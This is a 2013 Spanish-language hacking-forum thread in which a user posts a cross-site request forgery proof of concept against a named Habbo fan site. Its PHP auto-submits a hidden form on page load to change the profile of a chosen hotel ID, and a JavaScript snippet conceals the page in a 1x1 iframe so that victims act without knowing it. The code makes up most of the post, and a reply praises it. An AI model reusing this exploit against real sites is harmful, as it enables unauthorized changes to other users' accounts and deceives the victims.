comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Cross Site Request Forgery /Matabarras/

  • 1 Respuestas
  • 1462 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« en: Abril 27, 2013, 10:19:27 pm »
Buenas, hoy les explicare como explotamos una web con fallo de verificación en los tokens, lo que produce que podamos provocar acciones ilegitimas en nuestra "víctima" sin su cosentimiento ni conocimiento.

En este caso programe un CSRF; para la web ciudadhabbo, que simplemente, cuando el autor entra a nuestra web, automaticamente se le cambie el perfil de su hotel públicado, de la ID que indicamos.

También podriamos crear un CSRF, para públicar el hotel a base del que yo hice, muy sencillo.

Les dejo el tutorial donde explico los pasos.


CSRF:

Código: You are not allowed to view links. Register or Login
<?php
//Codded: Matabarras/Morenako
// POC Cambio de Hotel Ciudadhabbo
$url "ciudadhabbo.com";
$form["id"] = 26//ID del hotel que queremos modificar
$form["nombre"] = "Murlocksito JUAPO";
$form["tipo"] = 1;
$form["name"] = "127.0.0.1";
$form["port"] = 80;
$form["web"] = "http://www.morenakomatabarras.com";
$form["info"] = "Pues probando a que si murlock";
$form["guardar"] = "Guardar+cambios";




echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/doedit.php" method="POST">';
foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>



JS camuflando el csrf.
Código: You are not allowed to view links. Register or Login
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #1 en: Abril 28, 2013, 10:21:43 am »
Muy bueno Matabarras, gracias.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



Deface un site utilizando shell c99 por keymort

Iniciado por ..::key-m0rt::..

Respuestas: 4
Vistas: 3693
Último mensaje Marzo 30, 2011, 08:56:50 pm
por Devilboy
SQLi Site Scanner (SQPY)

Iniciado por hdbreaker

Respuestas: 3
Vistas: 3755
Último mensaje Octubre 06, 2014, 01:08:40 am
por Baku
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting Vulnerability

Iniciado por Mayk0

Respuestas: 0
Vistas: 1741
Último mensaje Noviembre 07, 2014, 01:55:54 pm
por Mayk0
Cross Site Scripting (XSS) y Vectores de Evasion

Iniciado por hdbreaker

Respuestas: 4
Vistas: 2419
Último mensaje Abril 05, 2013, 01:47:21 am
por zoro248
Cross site scripting en phpMyAdmin [XSS]

Iniciado por Snifer

Respuestas: 3
Vistas: 1451
Último mensaje Noviembre 20, 2011, 04:25:46 pm
por SPELINAX